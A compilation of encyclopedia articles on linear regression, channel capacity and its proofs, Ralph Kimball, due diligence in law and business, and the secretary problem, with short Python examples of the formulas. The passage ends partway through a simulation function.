Linear regression is commonly used in building science field studies to derive characteristics of building occupants. In a thermal comfort field study, building scientists usually ask for occupants' thermal sensation votes, which range from −3 (feeling cold) through 0 (neutral) to +3 (feeling hot), and measure occupants' surrounding temperature data. A neutral or comfort temperature can be calculated from a linear regression between the thermal sensation vote and indoor temperature by setting the thermal sensation vote to zero. However, there has been a debate on the regression direction: regressing thermal sensation votes (y-axis) against indoor temperature (x-axis), or the opposite, regressing indoor temperature (y-axis) against thermal sensation votes (x-axis).[33]
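A sketch of the neutral-temperature calculation under an assumed sensation model (the slope and the 24 °C neutral point are made up for illustration): fit vote against temperature, then solve the fitted line for a vote of zero:

```python
import numpy as np

rng = np.random.default_rng(8)
temp = rng.uniform(18.0, 30.0, size=120)            # indoor temperature, deg C
# assumed model: sensation votes cross zero (neutral) at 24 deg C
vote = 0.5 * (temp - 24.0) + rng.normal(scale=0.3, size=temp.size)

X = np.column_stack([np.ones(temp.size), temp])
b0, b1 = np.linalg.solve(X.T @ X, X.T @ vote)
neutral_temp = -b0 / b1   # temperature at which the predicted vote is zero
```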
Linear regression plays an important role in the subfield of artificial intelligence known as machine learning. The linear regression algorithm is one of the fundamental supervised machine-learning algorithms due to its relative simplicity and well-known properties.[34]

Isaac Newton is credited with inventing "a certain technique known today as linear regression analysis" in his work on equinoxes in 1700, and wrote down the first of the two normal equations of the ordinary least squares method.[35][36] Least-squares linear regression, as a means of finding a good rough linear fit to a set of points, was performed by Legendre (1805) and Gauss (1809) for the prediction of planetary movement. Quetelet was responsible for making the procedure well known and for using it extensively in the social sciences.[37]
|
https://en.wikipedia.org/wiki/Line_regression
|
Transmissibility may have several meanings:

In most contexts, transmissibility is related to permeability.

In medicine, transmissibility is a synonym for basic reproduction number and refers to transmission.
|
https://en.wikipedia.org/wiki/Transmissibility_(disambiguation)
|
Ralph Kimball (born July 18, 1944[1]) is an author on the subject of data warehousing and business intelligence. He is one of the original architects of data warehousing and is known for long-term convictions that data warehouses must be designed to be understandable and fast.[2][3] His bottom-up methodology, also known as dimensional modeling or the Kimball methodology, is one of the two main data warehousing methodologies, alongside that of Bill Inmon.[2][3]

He is the principal author of the best-selling[4] books The Data Warehouse Toolkit (1996),[5] The Data Warehouse Lifecycle Toolkit (1998), The Data Warehouse ETL Toolkit (2004) and The Kimball Group Reader (2015), published by Wiley and Sons.

After receiving a Ph.D.[4] in 1973 from Stanford University in electrical engineering (specializing in man-machine systems), Kimball joined the Xerox Palo Alto Research Center (PARC). At PARC he was a principal designer of the Xerox Star workstation, the first commercial product to use mice, icons and windows.

Kimball then became vice president of applications at Metaphor Computer Systems, a decision support software and services provider. He developed the Capsule Facility in 1982. The Capsule was a graphical programming technique which connected icons together in a logical flow, allowing a very visual style of programming for non-programmers. The Capsule was used to build reporting and analysis applications at Metaphor.

Kimball founded Red Brick Systems in 1986, serving as CEO until 1992. The company was acquired by Informix, which is now owned by IBM.[6] Red Brick was known for its relational database optimized for data warehousing. Its claim to fame was the use of bitmap indexes to achieve performance gains of almost 10 times that of other database vendors at the time.

Since 1992, Kimball has provided data warehouse consulting and education through various companies such as Ralph Kimball Associates and the Kimball Group.[7][4]
|
https://en.wikipedia.org/wiki/Ralph_Kimball
|
Channel capacity, inelectrical engineering,computer science, andinformation theory, is the theoretical maximum rate at whichinformationcan be reliably transmitted over acommunication channel.
Following the terms of the noisy-channel coding theorem, the channel capacity of a given channel is the highest information rate (in units of information per unit time) that can be achieved with arbitrarily small error probability.[1][2]
Information theory, developed by Claude E. Shannon in 1948, defines the notion of channel capacity and provides a mathematical model by which it may be computed. The key result states that the capacity of the channel, as defined above, is given by the maximum of the mutual information between the input and output of the channel, where the maximization is with respect to the input distribution.[3]
The notion of channel capacity has been central to the development of modern wireline and wireless communication systems, with the advent of novel error correction coding mechanisms that have resulted in achieving performance very close to the limits promised by channel capacity.
The basic mathematical model for a communication system is a message encoded by a transmitter into a channel input $X$, passed through a noisy channel, and decoded by a receiver from the channel output $Y$.
Let $X$ and $Y$ be modeled as random variables. Furthermore, let $p_{Y|X}(y|x)$ be the conditional probability distribution function of $Y$ given $X$, which is an inherent fixed property of the communication channel. Then the choice of the marginal distribution $p_X(x)$ completely determines the joint distribution $p_{X,Y}(x,y)$ due to the identity

$$p_{X,Y}(x,y) = p_{Y|X}(y|x)\,p_X(x),$$
which, in turn, induces a mutual information $I(X;Y)$. The channel capacity is defined as

$$C = \sup_{p_X(x)} I(X;Y),$$
where the supremum is taken over all possible choices of $p_X(x)$.
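As an illustration of this definition, the sketch below (hypothetical helper names; a coarse grid search stands in for the supremum) approximates the capacity of a binary symmetric channel with crossover probability p, which is known to equal $1 - H_2(p)$ and is attained at the uniform input:

```python
import math

def binary_entropy(q):
    """Binary entropy H2(q) in bits, with H2(0) = H2(1) = 0."""
    if q <= 0.0 or q >= 1.0:
        return 0.0
    return -q * math.log2(q) - (1 - q) * math.log2(1 - q)

def mutual_information_bsc(px, p):
    """I(X;Y) in bits for a BSC with crossover probability p and P(X=1) = px."""
    py1 = px * (1 - p) + (1 - px) * p   # P(Y = 1)
    return binary_entropy(py1) - binary_entropy(p)

def bsc_capacity(p, steps=10000):
    """Approximate C = sup_{p_X} I(X;Y) by a grid search over inputs."""
    return max(mutual_information_bsc(k / steps, p) for k in range(steps + 1))
```

For p = 0.1 this gives about 0.531 bits per channel use, with the maximum reached at the uniform input distribution.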
Channel capacity is additive over independent channels.[4] It means that using two independent channels in a combined manner provides the same theoretical capacity as using them independently.
More formally, let $p_1$ and $p_2$ be two independent channels modelled as above; $p_1$ having an input alphabet $\mathcal{X}_1$ and an output alphabet $\mathcal{Y}_1$, and likewise for $p_2$.
We define the product channel $p_1 \times p_2$ as

$$\forall (x_1,x_2)\in \mathcal{X}_1\times\mathcal{X}_2,\ (y_1,y_2)\in \mathcal{Y}_1\times\mathcal{Y}_2,\quad (p_1\times p_2)((y_1,y_2)|(x_1,x_2)) = p_1(y_1|x_1)\,p_2(y_2|x_2).$$
The additivity theorem states: $C(p_1\times p_2) = C(p_1) + C(p_2)$.
We first show that $C(p_1\times p_2) \geq C(p_1) + C(p_2)$.
Let $X_1$ and $X_2$ be two independent random variables. Let $Y_1$ be a random variable corresponding to the output of $X_1$ through the channel $p_1$, and $Y_2$ for $X_2$ through $p_2$.
By definition, $C(p_1\times p_2) = \sup_{p_{X_1,X_2}} I(X_1,X_2;Y_1,Y_2)$.
Since $X_1$ and $X_2$ are independent, as well as $p_1$ and $p_2$, $(X_1,Y_1)$ is independent of $(X_2,Y_2)$. We can apply the following property of mutual information: $I(X_1,X_2;Y_1,Y_2) = I(X_1;Y_1) + I(X_2;Y_2)$.
For now we only need to find a distribution $p_{X_1,X_2}$ such that $I(X_1,X_2;Y_1,Y_2) \geq I(X_1;Y_1) + I(X_2;Y_2)$. In fact, $\pi_1$ and $\pi_2$, two probability distributions for $X_1$ and $X_2$ achieving $C(p_1)$ and $C(p_2)$, suffice:

$$C(p_1\times p_2) \geq I(X_1,X_2;Y_1,Y_2) = I(X_1;Y_1) + I(X_2;Y_2) = C(p_1) + C(p_2),$$
i.e. $C(p_1\times p_2) \geq C(p_1) + C(p_2)$.
Now let us show that $C(p_1\times p_2) \leq C(p_1) + C(p_2)$.
Let $\pi_{12}$ be some distribution for the channel $p_1\times p_2$ defining $(X_1,X_2)$ and the corresponding output $(Y_1,Y_2)$. Let $\mathcal{X}_1$ be the alphabet of $X_1$, $\mathcal{Y}_1$ for $Y_1$, and analogously $\mathcal{X}_2$ and $\mathcal{Y}_2$.
By definition of mutual information, we have
$$\begin{aligned} I(X_1,X_2;Y_1,Y_2) &= H(Y_1,Y_2) - H(Y_1,Y_2|X_1,X_2) \\ &\leq H(Y_1) + H(Y_2) - H(Y_1,Y_2|X_1,X_2) \end{aligned}$$
Let us rewrite the last conditional entropy term.
$$H(Y_1,Y_2|X_1,X_2) = \sum_{(x_1,x_2)\in\mathcal{X}_1\times\mathcal{X}_2} \mathbb{P}(X_1,X_2 = x_1,x_2)\, H(Y_1,Y_2|X_1,X_2 = x_1,x_2)$$
By definition of the product channel, $\mathbb{P}(Y_1,Y_2 = y_1,y_2 | X_1,X_2 = x_1,x_2) = \mathbb{P}(Y_1 = y_1|X_1 = x_1)\,\mathbb{P}(Y_2 = y_2|X_2 = x_2)$.
For a given pair $(x_1,x_2)$, we can rewrite $H(Y_1,Y_2|X_1,X_2 = x_1,x_2)$ as:
$$\begin{aligned} H(Y_1,Y_2|X_1,X_2 = x_1,x_2) &= -\sum_{(y_1,y_2)\in\mathcal{Y}_1\times\mathcal{Y}_2} \mathbb{P}(Y_1,Y_2 = y_1,y_2|X_1,X_2 = x_1,x_2) \log \mathbb{P}(Y_1,Y_2 = y_1,y_2|X_1,X_2 = x_1,x_2) \\ &= -\sum_{(y_1,y_2)\in\mathcal{Y}_1\times\mathcal{Y}_2} \mathbb{P}(Y_1,Y_2 = y_1,y_2|X_1,X_2 = x_1,x_2)\,[\log \mathbb{P}(Y_1 = y_1|X_1 = x_1) + \log \mathbb{P}(Y_2 = y_2|X_2 = x_2)] \\ &= H(Y_1|X_1 = x_1) + H(Y_2|X_2 = x_2) \end{aligned}$$
By summing this equality over all $(x_1,x_2)$, weighted by $\mathbb{P}(X_1,X_2 = x_1,x_2)$, we obtain $H(Y_1,Y_2|X_1,X_2) = H(Y_1|X_1) + H(Y_2|X_2)$.
We can now give an upper bound on the mutual information:
$$\begin{aligned} I(X_1,X_2;Y_1,Y_2) &\leq H(Y_1) + H(Y_2) - H(Y_1|X_1) - H(Y_2|X_2) \\ &= I(X_1;Y_1) + I(X_2;Y_2) \end{aligned}$$
This relation is preserved at the supremum. Therefore

$$C(p_1\times p_2) \leq C(p_1) + C(p_2).$$
Combining the two inequalities we proved, we obtain the result of the theorem:

$$C(p_1\times p_2) = C(p_1) + C(p_2).$$
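The additivity theorem lends itself to a numerical sanity check. The sketch below (illustrative helper names, not from the original text) computes $I(X;Y)$ for an arbitrary discrete channel and builds the product channel exactly as defined above:

```python
import math

def mutual_information(px, channel):
    """I(X;Y) in bits, where px[x] = P(X=x) and channel[x][y] = P(y|x)."""
    ny = len(channel[0])
    py = [sum(px[x] * channel[x][y] for x in range(len(px))) for y in range(ny)]
    info = 0.0
    for x in range(len(px)):
        for y in range(ny):
            if px[x] > 0 and channel[x][y] > 0:
                info += px[x] * channel[x][y] * math.log2(channel[x][y] / py[y])
    return info

def product_channel(ch1, ch2):
    """(p1 x p2)((y1,y2)|(x1,x2)) = p1(y1|x1) * p2(y2|x2); rows index (x1,x2)."""
    return [[a * b for a in row1 for b in row2]
            for row1 in ch1 for row2 in ch2]
```

Evaluating two binary symmetric channels at their (uniform) capacity-achieving inputs, the product of the optimizers attains $C(p_1)+C(p_2)$, while randomly chosen joint inputs never exceed it.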
If G is an undirected graph, it can be used to define a communications channel in which the symbols are the graph vertices, and two codewords may be confused with each other if their symbols in each position are equal or adjacent. The computational complexity of finding the Shannon capacity of such a channel remains open, but it can be upper bounded by another important graph invariant, the Lovász number.[5]
The noisy-channel coding theorem states that for any error probability ε > 0 and for any transmission rate R less than the channel capacity C, there is an encoding and decoding scheme transmitting data at rate R whose error probability is less than ε, for a sufficiently large block length. Also, for any rate greater than the channel capacity, the probability of error at the receiver cannot be made arbitrarily small, no matter how large the block length.
An application of the channel capacity concept to an additive white Gaussian noise (AWGN) channel with B Hz bandwidth and signal-to-noise ratio S/N is the Shannon–Hartley theorem:

$$C = B \log_2\left(1 + \frac{S}{N}\right).$$
C is measured in bits per second if the logarithm is taken in base 2, or nats per second if the natural logarithm is used, assuming B is in hertz; the signal and noise powers S and N are expressed in a linear power unit (like watts or volts²). Since S/N figures are often cited in dB, a conversion may be needed. For example, a signal-to-noise ratio of 30 dB corresponds to a linear power ratio of $10^{30/10} = 10^3 = 1000$.
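The dB conversion and the theorem can be combined into a small helper (a sketch; the function name is illustrative):

```python
import math

def shannon_hartley(bandwidth_hz, snr_db):
    """AWGN channel capacity in bits per second (Shannon-Hartley theorem)."""
    snr_linear = 10 ** (snr_db / 10)      # dB -> linear power ratio
    return bandwidth_hz * math.log2(1 + snr_linear)
```

For example, a 3000 Hz channel at 30 dB SNR yields 3000 · log₂(1001) ≈ 29,900 bit/s.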
To determine the channel capacity, it is necessary to find the capacity-achieving distribution $p_X(x)$ and evaluate the mutual information $I(X;Y)$. Research has mostly focused on studying additive noise channels under certain power constraints and noise distributions, as analytical methods are not feasible in the majority of other scenarios. Hence, alternative approaches, such as investigation of the input support,[6] relaxations,[7] and capacity bounds,[8] have been proposed in the literature.
The capacity of a discrete memoryless channel can be computed using the Blahut–Arimoto algorithm.
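A minimal sketch of the Blahut–Arimoto iteration follows (assuming a row-stochastic `channel[x][y] = P(y|x)`; the fixed iteration count is a simplification of the usual convergence test):

```python
import math

def blahut_arimoto(channel, iterations=500):
    """Capacity (bits/channel use) of a DMC with channel[x][y] = P(y|x)."""
    nx, ny = len(channel), len(channel[0])
    px = [1.0 / nx] * nx                      # start from the uniform input
    for _ in range(iterations):
        py = [sum(px[x] * channel[x][y] for x in range(nx)) for y in range(ny)]
        # c[x] = exp( sum_y P(y|x) * ln( P(y|x) / P(y) ) )
        c = [math.exp(sum(channel[x][y] * math.log(channel[x][y] / py[y])
                          for y in range(ny) if channel[x][y] > 0))
             for x in range(nx)]
        total = sum(px[x] * c[x] for x in range(nx))
        px = [px[x] * c[x] / total for x in range(nx)]
    return math.log2(total)                   # lower bound, converges to C
```

For a binary symmetric channel the uniform input is already optimal, so the iteration reproduces $1 - H_2(p)$ immediately; for asymmetric channels, such as the Z-channel, more iterations tighten the estimate.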
Deep learning can be used to estimate the channel capacity. In fact, the channel capacity and the capacity-achieving distribution of any discrete-time continuous memoryless vector channel can be obtained using CORTICAL,[9] a cooperative framework inspired by generative adversarial networks. CORTICAL consists of two cooperative networks: a generator with the objective of learning to sample from the capacity-achieving input distribution, and a discriminator with the objective of learning to distinguish between paired and unpaired channel input-output samples and estimating $I(X;Y)$.
This section[10] focuses on the single-antenna, point-to-point scenario. For channel capacity in systems with multiple antennas, see the article on MIMO.
If the average received power is $\bar{P}$ [W], the total bandwidth is $W$ in Hertz, and the noise power spectral density is $N_0$ [W/Hz], the AWGN channel capacity is

$$C_{\text{AWGN}} = W \log_2\left(1 + \frac{\bar{P}}{N_0 W}\right)\ \text{[bits/s],}$$
where $\frac{\bar{P}}{N_0 W}$ is the received signal-to-noise ratio (SNR). This result is known as the Shannon–Hartley theorem.[11]
When the SNR is large (SNR ≫ 0 dB), the capacity $C \approx W \log_2 \frac{\bar{P}}{N_0 W}$ is logarithmic in power and approximately linear in bandwidth. This is called the bandwidth-limited regime.
When the SNR is small (SNR ≪ 0 dB), the capacity $C \approx \frac{\bar{P}}{N_0 \ln 2}$ is linear in power but insensitive to bandwidth. This is called the power-limited regime.
The bandwidth-limited regime and power-limited regime are illustrated in the figure.
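Both regimes can be checked against the exact formula; in this sketch (hypothetical helper name) the exact capacity is compared with the two approximations:

```python
import math

def awgn_capacity(p_bar, n0, w):
    """Exact AWGN capacity C = W log2(1 + P/(N0 W)) [bits/s]."""
    return w * math.log2(1 + p_bar / (n0 * w))
```

Numerically, at SNR = 1000 the exact capacity is within roughly 0.02% of $W\log_2(\bar{P}/(N_0 W))$, and at SNR = 10⁻⁴ it is within roughly 0.01% of $\bar{P}/(N_0 \ln 2)$, confirming the two asymptotic regimes.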
The capacity of the frequency-selective channel is given by the so-called water-filling power allocation,

$$C = \sum_{n} \log_2\left(1 + \frac{P_n^* |\bar{h}_n|^2}{N_0}\right),$$
where $P_n^* = \max\left\{\frac{1}{\lambda} - \frac{N_0}{|\bar{h}_n|^2},\, 0\right\}$ and $|\bar{h}_n|^2$ is the gain of subchannel $n$, with $\lambda$ chosen to meet the power constraint.
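The water-filling allocation can be sketched as follows, with $1/\lambda$ (the "water level") found by bisection on the total-power constraint (helper names are illustrative, not from the original text):

```python
import math

def water_filling(gains, total_power, n0=1.0):
    """Power allocation P_n = max(1/lambda - N0/g_n, 0), with lambda set by
    bisection so that the allocated powers sum to total_power."""
    def alloc(water_level):                   # water_level plays the role of 1/lambda
        return [max(water_level - n0 / g, 0.0) for g in gains]
    lo, hi = 0.0, total_power + n0 / min(gains)
    for _ in range(200):
        mid = (lo + hi) / 2
        if sum(alloc(mid)) < total_power:
            lo = mid                          # water level too low
        else:
            hi = mid
    powers = alloc((lo + hi) / 2)
    capacity = sum(math.log2(1 + p * g / n0) for p, g in zip(powers, gains))
    return powers, capacity
```

With gains [1.0, 0.5] and total power 3, the water level settles at 3, giving the allocation [2, 1]: the stronger subchannel receives more power.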
In a slow-fading channel, where the coherence time is greater than the latency requirement, there is no definite capacity, as the maximum rate of reliable communication supported by the channel, $\log_2(1 + |h|^2 \mathrm{SNR})$, depends on the random channel gain $|h|^2$, which is unknown to the transmitter. If the transmitter encodes data at rate $R$ [bits/s/Hz], there is a non-zero probability that the decoding error probability cannot be made arbitrarily small,

$$p_{out} = \mathbb{P}(\log_2(1 + |h|^2 \mathrm{SNR}) < R),$$
in which case the system is said to be in outage. With a non-zero probability that the channel is in deep fade, the capacity of the slow-fading channel in the strict sense is zero. However, it is possible to determine the largest value of $R$ such that the outage probability $p_{out}$ is less than $\epsilon$. This value is known as the $\epsilon$-outage capacity.
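The ε-outage capacity can be estimated by Monte Carlo simulation. The sketch below assumes Rayleigh fading, so that $|h|^2$ is exponentially distributed with unit mean (an illustrative assumption, not from the original text):

```python
import math
import random

def outage_capacity(snr, epsilon, trials=200000, seed=1):
    """Monte Carlo epsilon-outage capacity for Rayleigh fading: the largest R
    with P(log2(1 + |h|^2 * SNR) < R) <= epsilon, where |h|^2 ~ Exp(1)."""
    rng = random.Random(seed)
    rates = sorted(math.log2(1 + rng.expovariate(1.0) * snr)
                   for _ in range(trials))
    return rates[int(epsilon * trials)]       # empirical epsilon-quantile
```

For Exp(1) gains the result can be checked against the closed form $\log_2(1 + F^{-1}(\epsilon)\,\mathrm{SNR})$, where $F^{-1}(\epsilon) = -\ln(1-\epsilon)$ is the quantile function of the gain.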
In a fast-fading channel, where the latency requirement is greater than the coherence time and the codeword length spans many coherence periods, one can average over many independent channel fades by coding over a large number of coherence time intervals. Thus, it is possible to achieve a reliable rate of communication of $\mathbb{E}(\log_2(1 + |h|^2 \mathrm{SNR}))$ [bits/s/Hz], and it is meaningful to speak of this value as the capacity of the fast-fading channel.
Feedback capacity is the greatest rate at which information can be reliably transmitted, per unit time, over a point-to-point communication channel in which the receiver feeds back the channel outputs to the transmitter. Information-theoretic analysis of communication systems that incorporate feedback is more complicated and challenging than without feedback. Possibly, this was the reason C. E. Shannon chose feedback as the subject of the first Shannon Lecture, delivered at the 1973 IEEE International Symposium on Information Theory in Ashkelon, Israel.
The feedback capacity is characterized by the maximum of the directed information between the channel inputs and the channel outputs, where the maximization is with respect to the causal conditioning of the input given the output. The directed information was coined by James Massey[12] in 1990, who showed that it is an upper bound on feedback capacity. For memoryless channels, Shannon showed[13] that feedback does not increase the capacity, and the feedback capacity coincides with the channel capacity characterized by the mutual information between the input and the output. The feedback capacity is known as a closed-form expression only for several examples, such as the trapdoor channel[14] and the Ising channel.[15][16] For some other channels, it is characterized through constant-size optimization problems, such as the binary erasure channel with a no-consecutive-ones input constraint[17] and the NOST channel.[18]
The basic mathematical model is the same as in the nonfeedback setting, with the addition of a feedback link from the receiver to the transmitter; the only difference with respect to the nonfeedback capacity is the definition of the encoder, which may now depend on past channel outputs.
That is, for each time $i$ there exists a feedback of the previous output $Y_{i-1}$ such that the encoder has access to all previous outputs $Y^{i-1}$. A $(2^{nR}, n)$ code is a pair of encoding and decoding mappings with $\mathcal{W} = [1, 2, \dots, 2^{nR}]$, where $W$ is uniformly distributed. A rate $R$ is said to be achievable if there exists a sequence of $(2^{nR}, n)$ codes such that the average probability of error $P_e^{(n)} \triangleq \Pr({\hat{W}} \neq W)$ tends to zero as $n \to \infty$.
The feedback capacity is denoted by $C_{\text{feedback}}$, and is defined as the supremum over all achievable rates.
Let $X$ and $Y$ be modeled as random variables. The causal conditioning $P(y^n \| x^n) \triangleq \prod_{i=1}^{n} P(y_i | y^{i-1}, x^i)$ describes the given channel. The choice of the causally conditional distribution $P(x^n \| y^{n-1}) \triangleq \prod_{i=1}^{n} P(x_i | x^{i-1}, y^{i-1})$ determines the joint distribution $p_{X^n,Y^n}(x^n, y^n)$ due to the chain rule for causal conditioning,[19] $P(y^n, x^n) = P(y^n \| x^n) P(x^n \| y^{n-1})$, which, in turn, induces a directed information $I(X^N \rightarrow Y^N) = \mathbf{E}\left[\log \frac{P(Y^N \| X^N)}{P(Y^N)}\right]$.
The feedback capacity is given by

$$C_{\text{feedback}} = \lim_{n \to \infty} \frac{1}{n} \sup_{P_{X^n \| Y^{n-1}}} I(X^n \rightarrow Y^n),$$
where the supremum is taken over all possible choices of $P_{X^n \| Y^{n-1}}(x^n \| y^{n-1})$.
When the Gaussian noise is colored, the channel has memory. Consider for instance the simple case of an autoregressive model noise process $z_i = z_{i-1} + w_i$, where $w_i \sim N(0,1)$ is an i.i.d. process.
The feedback capacity is difficult to solve in the general case. There are some techniques that are related to control theory and Markov decision processes if the channel is discrete.
https://en.wikipedia.org/wiki/Channel_capacity
Due diligence is the investigation or exercise of care that a reasonable business or person is normally expected to take before entering into an agreement or contract with another party, or an act with a certain standard of care.
Due diligence can be a legal obligation, but the term more commonly applies to voluntary investigations. It may also offer a defence against legal action. A common example of due diligence is the process through which a potential acquirer evaluates a target company or its assets in advance of a merger or acquisition.[1] The theory behind due diligence holds that performing this type of investigation contributes significantly to informed decision making by enhancing the amount and quality of information available to decision makers and by ensuring that this information is systematically used to deliberate on the decision at hand and all its costs, benefits, and risks.[2]
The term "due diligence" can be read as "required carefulness" or "reasonable care" in general usage, and has been used in the literal sense of "requisite effort" since at least the mid-fifteenth century.[3] It became a specialized legal term and later a common business term due to the United States' Securities Act of 1933, where the process is called "reasonable investigation". Under Section 11b3, a person could avoid liability for an untrue statement of a material fact if they had, "after reasonable investigation, reasonable ground to believe and did believe, at the time", the truth of the statement.[4] The defense at Section 11, referred to later in legal usage as the "due diligence" defense, could be used by broker-dealers when accused of inadequate disclosure to investors of material information with respect to the purchase of securities. In legal and business use, the term was soon used for the process itself instead of how it was to be performed, so that the original expressions such as "exercise due diligence in investigating" and "investigation carried out with due diligence" were soon shortened to "due diligence investigation" and finally "due diligence".
As long as broker-dealers exercised "due diligence" (required carefulness) in their investigation into the company whose equity they were selling, and as long as they disclosed to the investor what they found, they would not be found liable for non-disclosure of information that was not discovered in the process of that investigation.
The broker-dealer community quickly institutionalized, as a standard practice, the conducting of due diligence investigations of any stock offerings in which they involved themselves. Originally the term was limited to public offerings of equity investments, but over time it has become associated with investigations of private mergers and acquisitions (M&A) as well.
Due diligence takes different forms depending on its purpose:
A due diligence process can be divided into nine distinct areas:[5]
It is essential that valuation concepts (shareholder value analysis) be considered in a due diligence process, in order to reduce the number of failed mergers and acquisitions.[5]
In this regard, two new audit areas have been incorporated into the Due Diligence framework:[5]
The relevant areas of concern may include the financial, legal, labor, tax, IT, environment and market/commercial situation of the company. Other areas include intellectual property, real and personal property, insurance and liability coverage, debt instrument review, employee benefits (including the Affordable Care Act) and labor matters, immigration, and international transactions.[9][10][11] Areas of focus in due diligence continue to develop, with cybersecurity emerging as an area of concern for business acquirers.[12] Risk is a key factor in determining 'duty of care'.[13] Regulations require 'reasonable security' in cybersecurity programs, and litigators examine whether 'due care' was practiced. Due diligence findings impact a number of aspects of the transaction, including the purchase price, the representations and warranties negotiated in the transaction agreement, and the indemnification provided by the sellers.
Due diligence has emerged as a separate profession for accounting and auditing experts, typically referred to as Transaction Services.
With the number and size of penalties increasing, the United States' Foreign Corrupt Practices Act (FCPA) has caused many U.S. institutions to look into how they evaluate all of their relationships overseas. A lack of due diligence on a company's agents, vendors, and suppliers, as well as merger and acquisition partners in foreign countries, could lead to doing business with an organization linked to a foreign official or to state-owned enterprises and their executives. This link could be perceived as leading to the bribing of the foreign officials and, as a result, lead to noncompliance with the FCPA. Due diligence in regard to FCPA compliance is required in two aspects:
In the M&A context, buyers can use the due diligence phase to integrate a target into their internal FCPA controls, focusing initial efforts on necessary revisions to the target's business activities with a high-risk of corruption.[15]
While financial institutions are among the most aggressive in defining FCPA best practices, manufacturing, retailing and energy industries are highly active in managing FCPA compliance programs.
In the United Kingdom, the Bribery Act 2010 requires companies using an "adequate procedures" defence to a charge of bribery to have undertaken due diligence on their business partners. Due diligence is described as "knowing exactly who you are dealing with". Official guidance suggests that "ask[ing] a few questions and do[ing] a few checks" can help to protect an organisation from taking on untrustworthy partners.[16]
On May 25, 2011, the OECD member countries agreed to revise their guidelines promoting tougher standards of corporate behavior, including human rights. As part of this revision, they utilized a new aspect of due diligence that requires a corporation to investigate third-party partners for potential abuse of human rights.
The OECD Guidelines for Multinational Enterprises (a government-backed international agreement that provides guidance on responsible business conduct) state that multinational enterprises will "Seek ways to prevent or mitigate adverse human rights impacts that are directly linked to their business operations, products or services by a business relationship, even if they do not contribute to those impacts".[17]
The term 'due diligence' was originally put forward in this context by UN Special Representative for Human Rights and Business John Ruggie, who used it as an umbrella to cover the steps and processes by which a company understands, monitors and mitigates its human rights impacts. Human Rights Impact Assessment is a component of this.
The UN formalized guidelines for Human Rights Due Diligence on June 16, 2011, with the endorsement of Ruggie's Guiding Principles for Business and Human Rights.[18]
Due diligence in civil procedure is the idea that reasonable investigation is necessary before certain kinds of relief are requested. For example, duly diligent efforts to locate and/or serve a party with civil process are frequently a requirement for a party seeking to use means other than personal service to obtain jurisdiction over a party. Similarly, in areas of the law such as bankruptcy, an attorney representing someone filing a bankruptcy petition must engage in due diligence to determine that the representations made in the bankruptcy petition are factually accurate. Due diligence is also generally a prerequisite to a request for relief in states where civil litigants are permitted to conduct pre-litigation discovery of facts necessary to determine whether or not a party has a factual basis for a cause of action.
In civil actions seeking a foreclosure or seizure of property, a party requesting this relief is frequently required to engage in due diligence to determine who may claim an interest in the property by reviewing public records concerning the property and sometimes by a physical inspection of the property that would reveal a possible interest in the property of a tenant or other person.
Due diligence is also a concept found in the civil litigation concept of a statute of limitations. Frequently, a statute of limitations begins to run against a plaintiff when that plaintiff knew, or would have known had the matter been investigated with due diligence, that the plaintiff had a claim against a defendant. In this context, the term "due diligence" determines the scope of a party's constructive knowledge upon receiving notice of facts sufficient to constitute "inquiry notice" that alerts a would-be plaintiff that further investigation might reveal a cause of action.
In criminal law, due diligence is the only available defense to a crime that is one of strict liability (i.e., a crime that only requires an actus reus and no mens rea). Once a criminal offence is proven, the defendant must prove on balance that they did everything possible to prevent the act from happening. It is not enough that they met the normal standard of care in their industry – they must show that they took every reasonable precaution.
The term "due diligence" is also used in criminal law to describe the scope of the duty of a prosecutor to make efforts to turn over potentially exculpatory evidence to (accused) criminal defendants.[citation needed]
In criminal law, "due diligence" also identifies the standard a prosecuting entity must satisfy in pursuing an action against a defendant, especially with regard to the provision of the Federal and State Constitutional and statutory right to a speedy trial or to have a warrant or detainer served in an action. In cases where a defendant is in any type of custodial situation where their freedom is constrained, it is solely the prosecuting entity's duty to ensure the provision of such rights and present the citizen before the court with jurisdiction. This also applies where the respective judicial system and/or prosecuting entity has current address or contact information on the named party and said party has made no attempt to evade notice of the prosecution of the action.[19]
In the United Kingdom, "proper use of a due diligence system" may be used as a defence against a charge of breach of regulations: for example, under the Timber and Timber Products (Placing on the Market) Regulations 2013[20] and the Environmental Protection (Microbeads) (England) Regulations 2017,[21] businesses may be able to defend a charge of non-compliance with regulations if they can show that they have undertaken supplier due diligence to a necessary standard. References to "due diligence" and the maintenance of a "due diligence system" in the regulation concerning timber are drawn from the European Union's Regulation 995/2010, which covers the legal obligations of "operators who place timber and timber products on the market".[20]
https://en.wikipedia.org/wiki/Due_diligence
The secretary problem demonstrates a scenario involving optimal stopping theory[1][2] that is studied extensively in the fields of applied probability, statistics, and decision theory. It is also known as the marriage problem, the sultan's dowry problem, the fussy suitor problem, the googol game, and the best choice problem. Its solution is also known as the 37% rule.[3]
The basic form of the problem is the following: imagine an administrator who wants to hire the best secretary out of $n$ rankable applicants for a position. The applicants are interviewed one by one in random order. A decision about each particular applicant is to be made immediately after the interview. Once rejected, an applicant cannot be recalled. During the interview, the administrator gains information sufficient to rank the applicant among all applicants interviewed so far, but is unaware of the quality of yet unseen applicants. The question is about the optimal strategy (stopping rule) to maximize the probability of selecting the best applicant. If the decision could be deferred to the end, the problem would be solved by the simple maximum selection algorithm of tracking the running maximum (and who achieved it) and selecting the overall maximum at the end. The difficulty is that the decision must be made immediately.
The shortest rigorous proof known so far is provided by the odds algorithm. It implies that the optimal win probability is always at least $1/e$ (where $e$ is the base of the natural logarithm), and that the latter holds even in a much greater generality. The optimal stopping rule prescribes always rejecting the first $\sim n/e$ applicants that are interviewed and then stopping at the first applicant who is better than every applicant interviewed so far (or continuing to the last applicant if this never occurs). Sometimes this strategy is called the $1/e$ stopping rule, because the probability of stopping at the best applicant with this strategy is already about $1/e$ for moderate values of $n$. One reason why the secretary problem has received so much attention is that the optimal policy for the problem (the stopping rule) is simple and selects the single best candidate about 37% of the time, irrespective of whether there are 100 or 100 million applicants. The secretary problem is an exploration–exploitation dilemma.
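The ~37% success rate of the $1/e$ stopping rule is easy to reproduce by simulation (a sketch with illustrative helper names):

```python
import math
import random

def run_trial(n, cutoff, rng):
    """One run of the cutoff rule: reject the first `cutoff` applicants, then
    accept the first applicant better than all seen so far."""
    ranks = list(range(n))            # rank n-1 is the best applicant
    rng.shuffle(ranks)
    best_seen = max(ranks[:cutoff], default=-1)
    for r in ranks[cutoff:]:
        if r > best_seen:
            return r == n - 1         # did we pick the overall best?
    return False                      # never found a better applicant

def success_rate(n, trials=100000, seed=0):
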